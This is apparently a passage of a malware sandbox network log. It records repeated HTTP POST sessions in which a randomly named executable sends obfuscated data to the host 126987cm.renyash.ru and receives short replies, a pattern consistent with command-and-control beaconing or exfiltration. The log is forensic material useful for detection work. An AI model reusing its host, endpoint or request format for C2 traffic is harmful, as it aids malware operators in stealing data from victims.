                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pbVsz1QXRTyQhOG3dKDi3L8%2BG%2F1UCqsQW8Q31IDB84QKFhXUX8PHsTqVnqtKlZTg26TR%2BVTcRKfwKzaju7DL05%2FoL1Jz99cyQjEC9NtrdgZ8zjJ2NKKGwM9l0EzZ5X9otliY6cs6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f447df54356-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3527&min_rtt=1754&rtt_var=4204&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=91593&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.4 | 50116 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:47.248581886 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:47.592991114 CET | 1072 | OUT | Data Raw: 54 50 5e 50 56 43 59 53 5d 56 5b 57 54 59 51 5b 58 51 58 5f 5b 51 57 49 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TP^PVCYS]V[WTYQ[XQX_[QWIVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!^3'_79!3358('"$'"]=%6(?1!^&%X*3
Jan 1, 2025 21:48:47.693223000 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:47.883339882 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:47 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IrK1g9kTVKfhGx6jpq4RNgvH2O5zOtPw1Okobmf2J6JHeOSPtBn7h6sAt7CXfjkZpjtvefEa3b2w4MTJoszfp0OkJF0so%2FxkxlXesVfQU7kdYCLxE7MaXvW0bOgME4%2BYJ0I0xYkK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f49cebf8c89-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4882&min_rtt=1825&rtt_var=6799&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=55549&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
110 | 192.168.2.4 | 50117 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:48.015149117 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:48.374222994 CET | 1072 | OUT | Data Raw: 54 56 5b 54 53 43 59 5f 5d 56 5b 57 54 5d 51 59 58 54 58 51 5b 51 57 48 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TV[TSCY_]V[WT]QYXTXQ[QWHVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!'" = = %=!#R+"64W$#&)!@?.;%:!^&%X*#
Jan 1, 2025 21:48:48.468806982 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:48.642044067 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:48 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tzQ3SVZWgXowcV3nx6rKWiQcHFDU8lbq7Ewe73TX4GMappmLLsF53cwXhBJUV7ZRuM6nzTikEqUjfbZdoHyJulOG%2BTwlNVSExLhRlDe9NNodlrtFPNJaa%2FH1OGS7f%2FDYfJonWkpb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f4e9ac9437e-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3597&min_rtt=1581&rtt_var=4626&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=82425&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
111 | 192.168.2.4 | 50118 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:48.797069073 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
112 | 192.168.2.4 | 50119 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:48.836599112 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:49.186752081 CET | 1788 | OUT | Data Raw: 54 56 5b 54 53 41 59 51 5d 56 5b 57 54 5a 51 5e 58 55 58 51 5b 56 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TV[TSAYQ]V[WTZQ^XUXQ[VWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X3/Z#1&6 0 ";*7(#68T$:Y=<'1!^&%X*?
Jan 1, 2025 21:48:49.280643940 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:49.456233978 CET | 953 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:49 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=40eCkzZJW9XvYC5ezmsuxfOKd3FWWe8OU%2ByZLqiijqTMh4QvpGL%2Fc7WqFLKs166hAG3WRvOdGm%2FCPtOfjNBGUO1RqFxMnie9WOZ1VgiAPPPFUAgsywj9y3w9pHMgZNemeXyS64Ua"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f53bad21a30-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3788&min_rtt=1911&rtt_var=4472&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=86217&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 22 0b 28 26 2f 57 21 22 0b 57 3e 06 01 1c 32 1f 3a 5b 26 20 3d 45 3f 38 2b 5f 3f 3c 27 0d 24 3c 2c 5c 27 5c 32 0f 2b 21 30 58 29 0c 20 5c 05 1b 39 5c 26 39 37 5f 25 15 00 0c 3e 0e 2f 01 23 01 26 1c 2a 33 28 55 34 06 39 5a 25 16 2d 1f 30 3a 03 0d 29 3c 27 1a 2a 1e 28 08 26 17 2a 51 0f 16 3b 0e 29 0e 00 10 3e 5a 33 07 24 31 06 5e 36 26 39 57 32 3b 27 1e 24 29 3d 01 2b 3e 27 1a 21 20 38 0a 26 3f 3d 06 32 3d 34 0a 2c 2a 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98"(&/W!"W>2:[& =E?8+_?<'$<,\'\2+!0X) \9\&97_%>/#&*3(U49Z%-0:)<'*(&*Q;)>Z3$1^6&9W2;'$)=+>'! 8&?=2=4,*&^ "S?UV0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                113 | 192.168.2.4 | 50120 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:48.957009077 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:49.311887980 CET | 1072 | OUT | Data Raw: 54 53 5e 52 53 40 59 52 5d 56 5b 57 54 5a 51 5b 58 5d 58 5c 5b 52 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TS^RS@YR]V[WTZQ[X]X\[RWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[![02$#T1 .7]3=(!7<B+Q6%/' 6=5>++1!^&%X*?
                                                                                                                                Jan 1, 2025 21:48:49.398617029 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:49.818738937 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:49 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eCrExkBp3s81%2Ba4XhhaYNOn6%2FJdL86tmrhqoUS570eIYDhZpPKASm4g%2BOxbRd0vkuF3FfgFp6LPJKMkszGRQyVlgRcU7DaKqtmioKMI2TxQjQyYzGmslX89NpaSJHd2p3X%2BJiwYn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f54797e7290-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2598&min_rtt=2028&rtt_var=1901&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=221547&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0
                                                                                                                                Jan 1, 2025 21:48:49.868674994 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:49 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eCrExkBp3s81%2Ba4XhhaYNOn6%2FJdL86tmrhqoUS570eIYDhZpPKASm4g%2BOxbRd0vkuF3FfgFp6LPJKMkszGRQyVlgRcU7DaKqtmioKMI2TxQjQyYzGmslX89NpaSJHd2p3X%2BJiwYn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f54797e7290-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2598&min_rtt=2028&rtt_var=1901&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=221547&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                114 | 192.168.2.4 | 50121 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:49.943753958 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:50.296350002 CET | 1072 | OUT | Data Raw: 54 51 5b 5e 56 4b 59 55 5d 56 5b 57 54 5d 51 5b 58 57 58 5e 5b 57 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TQ[^VKYU]V[WT]Q[XWX^[WWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!^$$#=Z5>]%>+5]+U<!(R3*[(&5C+-+2*!^&%X*#
                                                                                                                                Jan 1, 2025 21:48:50.411025047 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:50.677129030 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:50 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bf0k5j%2BOk6aUNT%2Fwr0gCVtxZYo6h0Pypy0XQ6Tqq87J4OM36FKYUbjJhHNtKSchrjcU7sYgz6MebVNH9ZFP0utd8KH6ekwF8IWnH8dbIbypGWWeSbJggCDvjiwIx9jur8vdy6TiV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f5aba4c728a-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3675&min_rtt=1947&rtt_var=4187&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=92557&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                115 | 192.168.2.4 | 50122 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:50.796118975 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:51.168596029 CET | 1072 | OUT | Data Raw: 54 51 5e 54 56 44 59 55 5d 56 5b 57 54 59 51 5a 58 50 58 5f 5b 51 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TQ^TVDYU]V[WTYQZXPX_[QWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!_30#"""X('!?<"$0"\=%9?0[':!^&%X*3
                                                                                                                                Jan 1, 2025 21:48:51.246347904 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:51.510941982 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:51 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fZbKNV6ArpfGBc2HAC1PqL8eSBclj7P96XXiFsDz1SDoDBf3toBVKvgYKEqhbWJfv%2BA4sLFIdV%2BfZAtG0mNAVZUR4amSqLxOmr0t3eObN%2Fhg5JCmuXTKtP10biCEmzRP9Mnfayn6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f5ffd404246-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3822&min_rtt=1625&rtt_var=5004&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=76029&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                116 | 192.168.2.4 | 50123 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:51.996612072 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1064
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:52.343014002 CET | 1064 | OUT | Data Raw: 54 57 5e 57 53 41 5c 54 5d 56 5b 57 54 5c 51 5f 58 54 58 50 5b 53 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TW^WSA\T]V[WT\Q_XTXP[SWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$#4. >;['=(Z"'R?7!%?33-*%@>>72!^&%X*7
                                                                                                                                Jan 1, 2025 21:48:52.449486971 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:52.623080969 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:52 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CSlXos7fUsMgyns0%2Ba%2FI7rV%2BrQmdYk1CEYv1UTeu34WAq4WXf92hTvg0VvsMgnn%2FaDu7RqEsNw6x1TwdVMuTPjCb6hiGkKPgMLrHusGT8CJyBMfYUgmnd1XDJTqFkWu3aKJwsrUi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f67894642d7-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3874&min_rtt=1597&rtt_var=5154&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1409&delivery_rate=73670&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                117 | 192.168.2.4 | 50124 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:52.768533945 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:53.124298096 CET | 1072 | OUT | Data Raw: 54 5e 5b 56 56 45 59 5f 5d 56 5b 57 54 5d 51 53 58 57 58 5a 5b 56 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T^[VVEY_]V[WT]QSXWXZ[VWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Y'"#2&"X?\354?'45&8S$ 1*%%+8&:!^&%X*#
                                                                                                                                Jan 1, 2025 21:48:53.231422901 CET | 25 | IN | HTTP/1.1 100 Continue
